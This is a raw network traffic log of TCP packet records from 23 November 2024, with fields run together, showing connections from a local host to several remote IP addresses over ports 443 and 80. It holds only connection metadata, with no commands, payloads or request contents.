                                                                                                                                                                                          Nov 23, 2024 17:44:23.462033033 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.488696098 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.488738060 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.488815069 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.488823891 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.488852024 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.488884926 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.517853022 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.517894030 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.517944098 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.517961979 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.517997980 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.518023968 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.557775021 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.557817936 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.557887077 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.557898045 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.557929039 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.557959080 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.575648069 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.575689077 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.575737000 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.575747967 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.575792074 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.575818062 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.593559980 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.593591928 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.593641043 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.593651056 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.593678951 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.593710899 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.609945059 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.609985113 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.610043049 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.610052109 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.610117912 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.623609066 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.623631954 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.623676062 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.623682022 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.623708010 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.623730898 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.629920959 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.629981995 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.629987955 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.630029917 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.630039930 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.630063057 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.630079031 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.630098104 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.630105019 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.713808060 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.713851929 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.714040995 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.715401888 CET49718443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.715430021 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.715517044 CET49718443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.715909958 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.715925932 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.716036081 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.716799021 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.716818094 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.717031002 CET49718443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.717046976 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.717158079 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.717170000 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.717957973 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.718005896 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.718147993 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.718206882 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.718221903 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.718578100 CET49721443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.718626976 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.718736887 CET49721443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.719059944 CET49721443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.719094992 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.825822115 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:23.825854063 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.825869083 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:23.825875998 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.554764986 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.555299997 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.555325031 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.555737019 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.556586981 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.556596041 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.557080030 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.557087898 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.557566881 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.557574987 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.605081081 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.605495930 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.605545044 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.606074095 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.606089115 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.621258020 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.621694088 CET49721443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.621716022 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.621731997 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.622056007 CET49718443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.622087002 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.622173071 CET49721443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.622180939 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.622637033 CET49718443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.622643948 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.995465040 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.995486021 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.995563030 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.995578051 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.995625019 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.995945930 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.995953083 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.995971918 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:25.996088982 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.996114016 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:25.996156931 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.000001907 CET49723443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.000087023 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.000197887 CET49723443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.000416040 CET49723443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.000453949 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.057807922 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.057836056 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.057912111 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.057945013 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.058197975 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.058233976 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.058257103 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.058361053 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.058387041 CET4434972013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.058444023 CET49720443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.061269999 CET49724443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.061307907 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.061444998 CET49724443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.061670065 CET49724443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.061683893 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.083467960 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.083550930 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.083657026 CET49718443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.083957911 CET49718443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.083977938 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.084001064 CET49718443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.084007978 CET4434971813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.084144115 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.084209919 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.084330082 CET49721443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.093697071 CET49721443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.093739033 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.093769073 CET49721443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.093787909 CET4434972113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.096793890 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.096837044 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.096988916 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.097002983 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.097044945 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.097095966 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.097107887 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.097132921 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.097222090 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.097238064 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103292942 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103328943 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103388071 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103427887 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103467941 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103626013 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103641987 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103653908 CET49717443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.103662014 CET4434971713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.106151104 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.106174946 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.106359959 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.106482983 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:26.106498957 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.333642006 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.333890915 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.333976030 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:26.334013939 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:26.334033012 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.369317055 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:26.369363070 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:26.369501114 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:26.369915962 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:26.369932890 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.647851944 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.647975922 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:27.651843071 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:27.651854038 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.652260065 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.660183907 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:27.660207033 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:27.660270929 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.804379940 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.807408094 CET49723443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:27.807451010 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.809494972 CET49723443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:27.809503078 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.884223938 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.885180950 CET49724443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:27.885237932 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.885848045 CET49724443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:27.885864973 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.923355103 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.924105883 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:27.924124002 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:27.924571991 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:27.924581051 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.013699055 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.014925003 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.014962912 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.015434027 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.015444994 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.016654015 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.017163992 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.017173052 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.017582893 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.017586946 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.264028072 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.264108896 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.264210939 CET49723443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.264516115 CET49723443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.264564037 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.264597893 CET49723443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.264614105 CET4434972313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.268119097 CET49729443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.268186092 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.268301964 CET49729443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.268481016 CET49729443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.268511057 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.342268944 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.342437029 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.342505932 CET49724443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.342708111 CET49724443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.342735052 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.342761040 CET49724443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.342777014 CET4434972413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.345731974 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.345767975 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.345844030 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.346000910 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.346010923 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.402434111 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.402677059 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.402757883 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:28.402997017 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:28.403012991 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.403036118 CET49728443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:28.403040886 CET44349728172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.420388937 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.420471907 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.420517921 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.420710087 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.420717001 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.420727968 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.420732021 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.423517942 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.423583031 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.423728943 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.423882008 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.423904896 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.439548969 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:28.474899054 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.474986076 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.475044966 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.475358009 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.475358009 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.475380898 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.475402117 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.476814032 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.476970911 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.477032900 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.477725983 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.477765083 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.477838039 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.477900982 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.477905989 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.477916002 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.477920055 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.479022026 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.479053020 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.480094910 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.480170012 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.480254889 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.480360031 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:28.480382919 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.560244083 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:28.560343027 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:28.560547113 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:28.684278965 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030491114 CET8049732185.215.113.16192.168.2.5
